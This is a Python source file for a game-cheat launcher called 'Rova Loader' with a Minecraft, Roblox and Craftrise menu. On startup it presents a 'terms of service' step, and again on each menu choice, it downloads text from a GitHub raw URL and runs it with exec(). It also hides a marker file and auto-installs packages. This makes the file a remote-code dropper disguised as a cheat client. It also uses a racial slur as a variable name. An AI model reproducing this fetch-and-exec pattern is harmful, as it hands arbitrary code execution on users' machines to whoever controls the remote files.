import sys
import time
from time import sleep, strftime
from datetime import datetime
import threading
import webbrowser, os, re, json, random
import msvcrt
import subprocess
import ctypes
try:
    from faker import Faker
    from requests import session
    from colorama import Fore, Style
    import requests, random, re
    from random import choice, randint, shuffle
    import requests, pystyle
    from pystyle import Write, Colors
    import subprocess
    import ctypes
except:
    os.system("pip install faker && pip install ctypes")
    os.system("pip install requests")
    os.system("pip install colorama && pip install subprocess")
    os.system('pip install requests && pip install bs4 && pip install pystyle && pip install pycryptodome')
from pystyle import Add, Center, Anime, Colors, Colorate, Write, System

def windowtitle(a):
    os.system(f"title {a}")

windowtitle("Rova Loader 1.0.8")

# CMD'yi %8 şeffaf yap
try:
    hwnd = ctypes.windll.kernel32.GetConsoleWindow()
    if hwnd:
        ctypes.windll.user32.SetLayeredWindowAttributes(
            hwnd, 0, int(255 * 0.92), 0x2
        )
except Exception as e:
    print(f"Transparency error: {e}")

# Sürüm kontrolü
CURRENT_VERSION = "1.1.1"  # Mevcut sürümünüzü burada belirtin
VERSION_URL = "https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/version.txt"
DISCORD_URL = "https://discord.gg/FjYFSQbgMH"

try:
    response = requests.get(VERSION_URL)
    if response.status_code == 200:
        latest_version = response.text.strip()
        if latest_version != CURRENT_VERSION:
            print("A newer version of our client is available. Please download the new version from Discord.")
            webbrowser.open(DISCORD_URL)
            input("Press ENTER to close.")
            exit()
    else:
        print("Failed to fetch version information.")
except Exception as e:
    print(f"Error checking version: {e}")
    exit()

# Banner ve devam eden işlemler
try:
    f = open('TOSVDOIAHWOIHSAKLFHWA.txt')
except FileNotFoundError:
    exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Term%20of%20Services.txt').text)
else:
    f.close
    subprocess.check_call(["attrib", "+H", "TOSVDOIAHWOIHSAKLFHWA.txt"])

banner = f"""                                      You have accepted Rova Loader's terms of service.

                                             ██████╗  ██████╗ ██╗   ██╗ █████╗ 
                                             ██╔══██╗██╔═══██╗██║   ██║██╔══██╗
                                             ██████╔╝██║   ██║██║   ██║███████║
                                             ██╔══██╗██║   ██║╚██╗ ██╔╝██╔══██║
                                             ██║  ██║╚██████╔╝ ╚████╔╝ ██║  ██║
                                             ╚═╝  ╚═╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═╝
                                                Press ENTER to continue.                                                                            
"""[1:]

Anime.Fade(Center.Center(banner), Colors.black_to_white, Colorate.Vertical, enter=True)

# MÀU
xnhac = "\033[1;36m"
do = "\033[1;31m"
luc = "\033[1;32m"
vang = "\033[1;33m"
xduong = "\033[1;34m"
hong = "\033[1;35m"
trang = "\033[1;39m"
whiteb = "\033[1;39m"
red = "\033[0;31m"
redb = "\033[1;31m"
end = '\033[0m'

# BY THAT VAPE USER
dev = "\033[1;39m[\033[1;31m×\033[1;39m]\033[1;39m"
nig = """
                                                 \033[1;39mRova Loader is FREE.

            \033[1;32m\033[1;39mWhat's new in RTA Loader 1.0.8 ? Checkout new feature & cheats here : https://discord.gg/FjYFSQbgMH



			     		  \033[1;36m  ██▀███   ▒█████   ██▒   █▓ ▄▄▄      
			     		  \033[1;36m ▓██ ▒ ██▒▒██▒  ██▒▓██░   █▒▒████▄    
			     		  \033[1;36m ▓██ ░▄█ ▒▒██░  ██▒ ▓██  █▒░▒██  ▀█▄  
			      		  \033[1;36m ▒██▀▀█▄  ▒██   ██░  ▒██ █░░░██▄▄▄▄██ 
			      		  \033[1;36m ░██▓ ▒██▒░ ████▓▒░   ▒▀█░   ▓█   ▓██▒
			      		  \033[1;36m ░ ▒▓ ░▒▓░░ ▒░▒░▒░    ░ ▐░   ▒▒   ▓▒█░
			      		  \033[1;36m ░▒ ░ ▒░  ░ ▒ ▒░    ░ ░░    ▒   ▒▒ ░
			    		  \033[1;36m ░░   ░ ░ ░ ░ ▒       ░░    ░   ▒   
			     		  \033[1;36m  ░         ░ ░        ░        ░  ░

                                                         \033[1;31m[\033[1;39mC\033[1;31m]
\033[1;39m                                                    \033[1;35m For credits.
   \033[0;31m                                            Choose your favourite game.

                                   		 \033[1;31m[\033[1;39m1\033[1;31m] \033[1;32mMinecraft
			          		 \033[1;31m[\033[1;39m2\033[1;31m] \033[1;32mRoblox(Soon)
				   		 \033[1;31m[\033[1;39m3\033[1;31m] \033[1;32mCraftrise(New)
			          		 \033[1;31m[\033[1;39m4\033[1;31m] \033[1;32mOther(New)

"""

print(nig)

while True:
    os.system('cls')
    print(nig)
    chon = Write.Input("           [×] >>  ", Colors.red_to_purple, interval=0.0025)
    if chon == '1':
        os.system('cls')
        print("                                              \033[1;39mLoading Minecraft Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Minecraft.txt').text)
    if chon == '--':
        os.system('cls')
        print("                                              \033[1;39mLoading Roblox Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Roblox.txt').text)
    if chon == '3':
        os.system('cls')
        print("                                              \033[1;39mLoading Craftrise Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/craftrise.txt').text)
    if chon == '4':
        os.system('cls')
        print("                                              \033[1;39mLoading Minecraft Page..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Other.txt').text)
    if chon == 'c' or chon == 'C':
        os.system('cls')
        print("                                                  \033[1;39mRendering Credits..")
        exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Credits.txt').text)
    else:
        continue
